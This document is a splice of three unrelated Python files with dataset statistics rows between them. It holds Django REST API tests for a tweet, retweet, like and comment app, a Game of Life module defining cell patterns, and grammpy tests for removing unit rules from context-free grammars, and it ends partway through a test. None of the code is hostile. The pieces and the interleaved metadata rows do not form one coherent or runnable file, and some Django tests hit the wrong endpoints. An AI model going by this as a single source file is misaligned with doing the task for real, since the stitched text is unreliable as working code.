response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_tweet(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('tweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Tweet.objects.count(), 1)
self.assertEqual(response_data[0]['text'], tweet.text)
def test_post_tweet(self):
"""
Ensure we can create a new tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
url = reverse('tweet-list')
data = {'text': 'DabApps', "user": user.id}
response = self.client.post(url, data) # format='json'
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Tweet.objects.count(), 1)
self.assertEqual(Tweet.objects.get().text, data['text'])
self.assertEqual(response_data['text'], data['text'])
def test_delete_tweet(self):
"""
Ensure we can delete the tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="No Bill Me", user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data = {'text': 'DabApps', "user": user.id}
response = self.client.delete(url,data, format = 'json')
# response_data = response.json()
# print(response)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_patch_tweet(self):
"""
Ensure we can patch the tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" SpaceX_project loading...... ", user=user)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.patch(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
################################################################################################################3
class RetweetTests(APITestCase):
def test_post_retweet(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="on God", user=user)
url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.post(url, data, format='json')
response_data = response.json()
print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_get_retweet(self):
user=User.objects.create_user(username='j_one',password='password123')
tweet = Tweet.objects.create(text='God is at work',user=user)
url= reverse('retweet-list')
data={'tweet':tweet.id,'user':user.id}
response= self.client.get(url,data,format='json')
response_data=response.json()
print(response_data)
self.assertEqual(response.status_code,status.HTTP_200_OK)
def test_one_get_retweet(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
def test_delete_retweet(self):
"""
Ensure we can delete the retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Awesome God", user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
# url = reverse('retweet-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.delete(url,data, format = 'json')
# response_data = response.json()
# print(response)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
########################################################################################################################
class LikeTests(APITestCase):
def test_post_like(self):
"""
Ensure we can like tweet object.
"""
user = User.objects.create_user(username="oladapo", password="password123")
tweet = Tweet.objects.create(text="We are getting there", user=user)
url = reverse('like-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.post(url, data, format='json')
response_data = response.json()
print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_get_like(self):
"""
Ensure we can get tweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Omooo eh don dey choke oooooo",user=user)
url = reverse("like-list")
data ={'tweet':tweet.id, "user":user.id}
response = self.client.get(url,data,format='json')
# print("done")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_like(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
url = reverse('like-list')
data = {'tweet': tweet.id, "user": user.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
def test_delete_like(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesuChristian',user=user)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data= {'tweet':tweet.id,'user':user.id}
response = self.client.delete(url,data,format='json')
print('complete')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# #####################################################################################################################################
class CommentTest(APITestCase):
def test_create_comment(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesusChristian',user=user)
comment = Comment.objects.create(text='this is a new comment', user = user, tweet=tweet)
url = reverse('tweet-list')
data= {'tweet':tweet.id,'user':user.id, 'text':'corrected by Mr. Johnson.py'}
response = self.client.post(url,data)
response_data = response.json
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_patch_comment(self):
user = User.objects.create_user(username="lami",password="password123")
tweet = Tweet.objects.create(text="Monday", user=user)
comment = Comment.objects.create(text='all on God ni oooooo', user = user, tweet=tweet)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data = {'tweet':tweet.id,"user":user.id}
response = self.client.patch(url,data,format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_put_comment(self):
"""
Ensure we can put the comment object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text=" Elon Musk SpaceX_project put it in X2...... ", user=user)
comment = Comment.objects.create(text='all on God ni oooooo', user = user, tweet=tweet)
url = reverse('tweet-detail', kwargs={'pk':tweet.id})
data = {'text': 'Lami', 'user': user.id}
response = self.client.put(url, data)
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_comment(self):
"""
Ensure we can get comment object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="Omooo eh don dey choke oooooo",user=user)
comment = Comment.objects.create(text='thanks to Almighty God, the Alpha and Omega', user = user, tweet=tweet)
url = reverse("like-list")
data ={'tweet':tweet.id, "user":user.id}
response = self.client.get(url,data,format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_one_get_comment(self):
"""
Ensure we can create a new retweet object.
"""
user = User.objects.create_user(username="lami", password="password123")
tweet = Tweet.objects.create(text="this is a simple tweet", user=user)
comment = Comment.objects.create(text = 'omooo this Django nah die iswear', tweet = tweet, user = user)
# url = reverse('comment-list')
url = reverse('comment-detail', kwargs={'pk':comment.id})
data = {'tweet': tweet.id, "user": user.id, 'text': comment.id}
response = self.client.get(url, data, format='json')
response_data = response.json()
# print(response_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Comment.objects.count(), 1)
# self.assertEqual(response_data['text'], tweet.text)
def test_delete_comment(self):
user = User.objects.create_user(username='lami', password='password')
tweet = Tweet.objects.create(text='JesuChristian',user=user)
comment = Comment.objects.create(text='Segun we are getting there', user = user, tweet=tweet)
url = reverse('tweet-detail',kwargs={"pk":tweet.id})
data= {'tweet':tweet.id,'user':user.id}
response = self.client.delete(url,data,format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
| 36.306122 | 135 | 0.61174 | 1,486 | 12,453 | 5.016824 | 0.084118 | 0.069752 | 0.057009 | 0.056338 | 0.90664 | 0.88008 | 0.850973 | 0.806573 | 0.780952 | 0.77666 | 0 | 0.011512 | 0.225729 | 12,453 | 342 | 136 | 36.412281 | 0.761668 | 0.086726 | 0 | 0.683616 | 0 | 0 | 0.132437 | 0 | 0 | 0 | 0 | 0 | 0.135593 | 1 | 0.112994 | false | 0.112994 | 0.028249 | 0 | 0.163842 | 0.022599 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
dad5dd734893c7db9e2fd7470d7b3bca5202f66c | 2,076 | py | Python | GoLEntities.py | plencka/Game-of-Life-Python-Entity-Based | 49529cd0d1090631f5a110b42a34e009b57edcb3 | [
"MIT"
] | 1 | 2019-06-15T19:02:05.000Z | 2019-06-15T19:02:05.000Z | GoLEntities.py | plencka/Game-of-Life-Python-Entity-Based | 49529cd0d1090631f5a110b42a34e009b57edcb3 | [
"MIT"
] | null | null | null | GoLEntities.py | plencka/Game-of-Life-Python-Entity-Based | 49529cd0d1090631f5a110b42a34e009b57edcb3 | [
"MIT"
] | 1 | 2019-10-27T13:16:44.000Z | 2019-10-27T13:16:44.000Z | #Component of GoLPyEntity.
#Predefined entities that can be placed on board using GoLSpawnSet.py
import time, os
class eBush:
def __init__(self,offsetX,offsetY):
self.l = 6
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,0+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,2+offsetY])
class eBlink:
def __init__(self,offsetX,offsetY):
self.l = 3
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
class eFlyer:
def __init__(self,offsetX,offsetY):
self.l = 5
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,0+offsetY])
self.pos.append([2+offsetX,1+offsetY])
class eGrower:
def __init__(self,offsetX,offsetY):
self.l = 6
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,1+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([2+offsetX,2+offsetY])
class eFlower:
def __init__(self,offsetX,offsetY):
self.l = 8
self.pos = []
self.pos.append([0+offsetX,0+offsetY])
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([0+offsetX,4+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,3+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([2+offsetX,2+offsetY])
self.pos.append([2+offsetX,4+offsetY])
class ePyramid:
def __init__(self,offsetX,offsetY):
self.l = 8
self.pos = []
self.pos.append([0+offsetX,2+offsetY])
self.pos.append([1+offsetX,1+offsetY])
self.pos.append([1+offsetX,3+offsetY])
self.pos.append([2+offsetX,0+offsetY])
self.pos.append([2+offsetX,1+offsetY])
self.pos.append([2+offsetX,2+offsetY])
self.pos.append([2+offsetX,3+offsetY])
self.pos.append([2+offsetX,4+offsetY]) | 31.454545 | 69 | 0.70183 | 341 | 2,076 | 4.202346 | 0.117302 | 0.205164 | 0.326588 | 0.418702 | 0.879972 | 0.879972 | 0.874389 | 0.832519 | 0.801117 | 0.801117 | 0 | 0.041981 | 0.10501 | 2,076 | 66 | 70 | 31.454545 | 0.729279 | 0.044798 | 0 | 0.803279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098361 | false | 0 | 0.016393 | 0 | 0.213115 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9734404fe1ddd04beae4442968f942f68967c4cd | 19,226 | py | Python | tests/transformations_test/RemovingUnitRules/SimpleTest.py | PatrikValkovic/grammpy | 8308a1fd349bf9ea0d267360cc9a4ab20d1629e8 | [
"MIT"
] | 1 | 2021-02-04T12:41:08.000Z | 2021-02-04T12:41:08.000Z | tests/transformations_test/RemovingUnitRules/SimpleTest.py | PatrikValkovic/grammpy | 8308a1fd349bf9ea0d267360cc9a4ab20d1629e8 | [
"MIT"
] | 3 | 2017-07-08T16:28:52.000Z | 2020-04-23T18:06:24.000Z | tests/transformations_test/RemovingUnitRules/SimpleTest.py | PatrikValkovic/grammpy | 8308a1fd349bf9ea0d267360cc9a4ab20d1629e8 | [
"MIT"
] | 1 | 2021-02-04T12:41:10.000Z | 2021-02-04T12:41:10.000Z | #!/usr/bin/env python
"""
:Author Patrik Valkovic
:Created 22.08.2017 20:51
:Licence MIT
Part of grammpy
"""
from inspect import isclass
from unittest import main, TestCase
from grammpy import *
from grammpy.transforms import ContextFree
class S(Nonterminal): pass
class A(Nonterminal): pass
class B(Nonterminal): pass
class C(Nonterminal): pass
class D(Nonterminal): pass
class Rules(Rule):
rules=[
([S], [A]),
([S], [B]),
([A], [C]),
([A], [0, A]),
([A], [1, S]),
([B], [D]),
([B], [2, B]),
([B], [3, S]),
([C], [1, C]),
([C], [0]),
([D], [3, D]),
([D], [2])]
"""
-------------------------------
| S | A | B | C | D |
--------------------------------
S| [] | [1] | [2] |[1,3]|[2,6]|
--------------------------------
A| | [] | | [3] | |
--------------------------------
B| | | [] | | [6] |
--------------------------------
C| | | | [] | |
--------------------------------
D| | | | | [] |
--------------------------------
S->A S->B A->C A->0A A->1S B->D B->2B B->3S C->1C C->0 D->3D D->2
---- ---- ---- ----
S->A->0A
S->A->1S
S->A->C->1C
S->A->C->0
S->B->2B
S->B->3S
S->B->D->3D
S->B->D->2
A->C->1C
A->C->0
B->D->3D
B->D->2
"""
class SimpleTest(TestCase):
def test_simpleTest(self):
g = Grammar(terminals=[0, 1, 2, 3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
com = ContextFree.remove_unit_rules(g)
# Removed
class RuleStoA(Rule): rule=([S], [A])
self.assertNotIn(RuleStoA, com.rules)
class RuleStoB(Rule): rule=([S], [B])
self.assertNotIn(RuleStoB, com.rules)
class RuleAtoC(Rule): rule=([A], [C])
self.assertNotIn(RuleAtoC, com.rules)
class RuleBtoD(Rule): rule=([B], [D])
self.assertNotIn(RuleBtoD, com.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, com.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, com.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, com.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, com.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, com.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, com.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, com.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, com.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertIn(RuleNewSto0A, com.rules)
fromSto0A = list(filter(lambda x: hash(x) == hash(RuleNewSto0A), com.rules))[0]
self.assertTrue(isclass(fromSto0A))
self.assertTrue(issubclass(fromSto0A, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0A.by_rules), 1)
self.assertEqual(fromSto0A.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0A.end_rule.rule, ([A], [0, A]))
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertIn(RuleNewSto1S, com.rules)
fromSto1S = list(filter(lambda x: hash(x) == hash(RuleNewSto1S), com.rules))[0]
self.assertTrue(isclass(fromSto1S))
self.assertTrue(issubclass(fromSto1S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1S.by_rules), 1)
self.assertEqual(fromSto1S.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1S.end_rule.rule, ([A], [1, S]))
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertIn(RuleNewSto1C, com.rules)
fromSto1C = list(filter(lambda x: hash(x) == hash(RuleNewSto1C), com.rules))[0]
self.assertTrue(isclass(fromSto1C))
self.assertTrue(issubclass(fromSto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1C.by_rules), 2)
self.assertEqual(fromSto1C.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1C.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto1C.end_rule.rule, ([C], [1, C]))
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertIn(RuleNewSto0, com.rules)
fromSto0 = list(filter(lambda x: hash(x) == hash(RuleNewSto0), com.rules))[0]
self.assertTrue(isclass(fromSto0))
self.assertTrue(issubclass(fromSto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0.by_rules), 2)
self.assertEqual(fromSto0.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto0.end_rule.rule, ([C], [0]))
class RuleNewSto2B(Rule): rule = ([S], [2, B])
self.assertIn(RuleNewSto2B, com.rules)
fromSto2B = list(filter(lambda x: hash(x) == hash(RuleNewSto2B), com.rules))[0]
self.assertTrue(isclass(fromSto2B))
self.assertTrue(issubclass(fromSto2B, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2B.by_rules), 1)
self.assertEqual(fromSto2B.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2B.end_rule.rule, ([B], [2, B]))
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertIn(RuleNewSto3S, com.rules)
fromSto3S = list(filter(lambda x: hash(x) == hash(RuleNewSto3S), com.rules))[0]
self.assertTrue(isclass(fromSto3S))
self.assertTrue(issubclass(fromSto3S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3S.by_rules), 1)
self.assertEqual(fromSto3S.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3S.end_rule.rule, ([B], [3, S]))
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertIn(RuleNewSto3D, com.rules)
fromSto3D = list(filter(lambda x: hash(x) == hash(RuleNewSto3D), com.rules))[0]
self.assertTrue(isclass(fromSto3D))
self.assertTrue(issubclass(fromSto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3D.by_rules), 2)
self.assertEqual(fromSto3D.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3D.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto3D.end_rule.rule, ([D], [3, D]))
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertIn(RuleNewSto2, com.rules)
fromSto2 = list(filter(lambda x: hash(x) == hash(RuleNewSto2), com.rules))[0]
self.assertTrue(isclass(fromSto2))
self.assertTrue(issubclass(fromSto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2.by_rules), 2)
self.assertEqual(fromSto2.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto2.end_rule.rule, ([D], [2]))
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertIn(RuleNewAto1C, com.rules)
fromAto1C = list(filter(lambda x: hash(x) == hash(RuleNewAto1C), com.rules))[0]
self.assertTrue(isclass(fromAto1C))
self.assertTrue(issubclass(fromAto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto1C.by_rules), 1)
self.assertEqual(fromAto1C.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto1C.end_rule.rule, ([C], [1, C]))
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertIn(RuleNewAto0, com.rules)
fromAto0 = list(filter(lambda x: hash(x) == hash(RuleNewAto0), com.rules))[0]
self.assertTrue(isclass(fromAto0))
self.assertTrue(issubclass(fromAto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto0.by_rules), 1)
self.assertEqual(fromAto0.by_rules[0].rule, ([A], [C]))
self.assertEqual(fromAto0.end_rule.rule, ([C], [0]))
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertIn(RuleNewBto3D, com.rules)
fromBto3D = list(filter(lambda x: hash(x) == hash(RuleNewBto3D), com.rules))[0]
self.assertTrue(isclass(fromBto3D))
self.assertTrue(issubclass(fromBto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto3D.by_rules), 1)
self.assertEqual(fromBto3D.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto3D.end_rule.rule, ([D], [3, D]))
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertIn(RuleNewBto2, com.rules)
fromBto2 = list(filter(lambda x: hash(x) == hash(RuleNewBto2), com.rules))[0]
self.assertTrue(isclass(fromBto2))
self.assertTrue(issubclass(fromBto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromBto2.by_rules), 1)
self.assertEqual(fromBto2.by_rules[0].rule, ([B], [D]))
self.assertEqual(fromBto2.end_rule.rule, ([D], [2]))
def test_simpleTestShouldNotChange(self):
g = Grammar(terminals=[0,1,2,3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
ContextFree.remove_unit_rules(g)
# Removed
class RuleStoA(Rule): rule = ([S], [A])
self.assertIn(RuleStoA, g.rules)
class RuleStoB(Rule): rule = ([S], [B])
self.assertIn(RuleStoB, g.rules)
class RuleAtoC(Rule): rule = ([A], [C])
self.assertIn(RuleAtoC, g.rules)
class RuleBtoD(Rule): rule = ([B], [D])
self.assertIn(RuleBtoD, g.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, g.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, g.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, g.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, g.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, g.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, g.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, g.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, g.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertNotIn(RuleNewSto0A, g.rules)
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertNotIn(RuleNewSto1S, g.rules)
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertNotIn(RuleNewSto1C, g.rules)
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertNotIn(RuleNewSto0, g.rules)
class RuleNewSto2B(Rule): rule = ([S], [2, B])
self.assertNotIn(RuleNewSto2B, g.rules)
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertNotIn(RuleNewSto3S, g.rules)
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertNotIn(RuleNewSto3D, g.rules)
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertNotIn(RuleNewSto2, g.rules)
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertNotIn(RuleNewAto1C, g.rules)
class RuleNewAto0(Rule): rule = ([A], [0])
self.assertNotIn(RuleNewAto0, g.rules)
class RuleNewBto3D(Rule): rule = ([B], [3, D])
self.assertNotIn(RuleNewBto3D, g.rules)
class RuleNewBto2(Rule): rule = ([B], [2])
self.assertNotIn(RuleNewBto2, g.rules)
def test_simpleTestShouldChange(self):
g = Grammar(terminals=[0,1,2,3],
nonterminals=[S, A, B, C, D],
rules=[Rules],
start_symbol=S)
ContextFree.remove_unit_rules(g, True)
# Removed
class RuleStoA(Rule): rule = ([S], [A])
self.assertNotIn(RuleStoA, g.rules)
class RuleStoB(Rule): rule = ([S], [B])
self.assertNotIn(RuleStoB, g.rules)
class RuleAtoC(Rule): rule = ([A], [C])
self.assertNotIn(RuleAtoC, g.rules)
class RuleBtoD(Rule): rule = ([B], [D])
self.assertNotIn(RuleBtoD, g.rules)
# Old rules
class RuleNewAto0A(Rule): rule = ([A], [0, A])
self.assertIn(RuleNewAto0A, g.rules)
class RuleNewAto1S(Rule): rule = ([A], [1, S])
self.assertIn(RuleNewAto1S, g.rules)
class RuleNewBto2B(Rule): rule = ([B], [2, B])
self.assertIn(RuleNewBto2B, g.rules)
class RuleNewBto3S(Rule): rule = ([B], [3, S])
self.assertIn(RuleNewBto3S, g.rules)
class RuleNewCto1C(Rule): rule = ([C], [1, C])
self.assertIn(RuleNewCto1C, g.rules)
class RuleNewCto0(Rule): rule = ([C], [0])
self.assertIn(RuleNewCto0, g.rules)
class RuleNewDto3D(Rule): rule = ([D], [3, D])
self.assertIn(RuleNewDto3D, g.rules)
class RuleNewDto2(Rule): rule = ([D], [2])
self.assertIn(RuleNewDto2, g.rules)
# New rules
class RuleNewSto0A(Rule): rule = ([S], [0, A])
self.assertIn(RuleNewSto0A, g.rules)
fromSto0A = list(filter(lambda x: hash(x) == hash(RuleNewSto0A), g.rules))[0]
self.assertTrue(isclass(fromSto0A))
self.assertTrue(issubclass(fromSto0A, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0A.by_rules), 1)
self.assertEqual(fromSto0A.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0A.end_rule.rule, ([A], [0, A]))
class RuleNewSto1S(Rule): rule = ([S], [1, S])
self.assertIn(RuleNewSto1S, g.rules)
fromSto1S = list(filter(lambda x: hash(x) == hash(RuleNewSto1S), g.rules))[0]
self.assertTrue(isclass(fromSto1S))
self.assertTrue(issubclass(fromSto1S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1S.by_rules), 1)
self.assertEqual(fromSto1S.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1S.end_rule.rule, ([A], [1, S]))
class RuleNewSto1C(Rule): rule = ([S], [1, C])
self.assertIn(RuleNewSto1C, g.rules)
fromSto1C = list(filter(lambda x: hash(x) == hash(RuleNewSto1C), g.rules))[0]
self.assertTrue(isclass(fromSto1C))
self.assertTrue(issubclass(fromSto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto1C.by_rules), 2)
self.assertEqual(fromSto1C.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto1C.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto1C.end_rule.rule, ([C], [1, C]))
class RuleNewSto0(Rule): rule = ([S], [0])
self.assertIn(RuleNewSto0, g.rules)
fromSto0 = list(filter(lambda x: hash(x) == hash(RuleNewSto0), g.rules))[0]
self.assertTrue(isclass(fromSto0))
self.assertTrue(issubclass(fromSto0, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto0.by_rules), 2)
self.assertEqual(fromSto0.by_rules[0].rule, ([S], [A]))
self.assertEqual(fromSto0.by_rules[1].rule, ([A], [C]))
self.assertEqual(fromSto0.end_rule.rule, ([C], [0]))
class RuleNewSto2B(Rule): rule = ([S], [2, B])
self.assertIn(RuleNewSto2B, g.rules)
fromSto2B = list(filter(lambda x: hash(x) == hash(RuleNewSto2B), g.rules))[0]
self.assertTrue(isclass(fromSto2B))
self.assertTrue(issubclass(fromSto2B, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2B.by_rules), 1)
self.assertEqual(fromSto2B.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2B.end_rule.rule, ([B], [2, B]))
class RuleNewSto3S(Rule): rule = ([S], [3, S])
self.assertIn(RuleNewSto3S, g.rules)
fromSto3S = list(filter(lambda x: hash(x) == hash(RuleNewSto3S), g.rules))[0]
self.assertTrue(isclass(fromSto3S))
self.assertTrue(issubclass(fromSto3S, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3S.by_rules), 1)
self.assertEqual(fromSto3S.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3S.end_rule.rule, ([B], [3, S]))
class RuleNewSto3D(Rule): rule = ([S], [3, D])
self.assertIn(RuleNewSto3D, g.rules)
fromSto3D = list(filter(lambda x: hash(x) == hash(RuleNewSto3D), g.rules))[0]
self.assertTrue(isclass(fromSto3D))
self.assertTrue(issubclass(fromSto3D, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto3D.by_rules), 2)
self.assertEqual(fromSto3D.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto3D.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto3D.end_rule.rule, ([D], [3, D]))
class RuleNewSto2(Rule): rule = ([S], [2])
self.assertIn(RuleNewSto2, g.rules)
fromSto2 = list(filter(lambda x: hash(x) == hash(RuleNewSto2), g.rules))[0]
self.assertTrue(isclass(fromSto2))
self.assertTrue(issubclass(fromSto2, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromSto2.by_rules), 2)
self.assertEqual(fromSto2.by_rules[0].rule, ([S], [B]))
self.assertEqual(fromSto2.by_rules[1].rule, ([B], [D]))
self.assertEqual(fromSto2.end_rule.rule, ([D], [2]))
class RuleNewAto1C(Rule): rule = ([A], [1, C])
self.assertIn(RuleNewAto1C, g.rules)
fromAto1C = list(filter(lambda x: hash(x) == hash(RuleNewAto1C), g.rules))[0]
self.assertTrue(isclass(fromAto1C))
self.assertTrue(issubclass(fromAto1C, ContextFree.ReducedUnitRule))
self.assertEqual(len(fromAto1C.by_rules), 1)
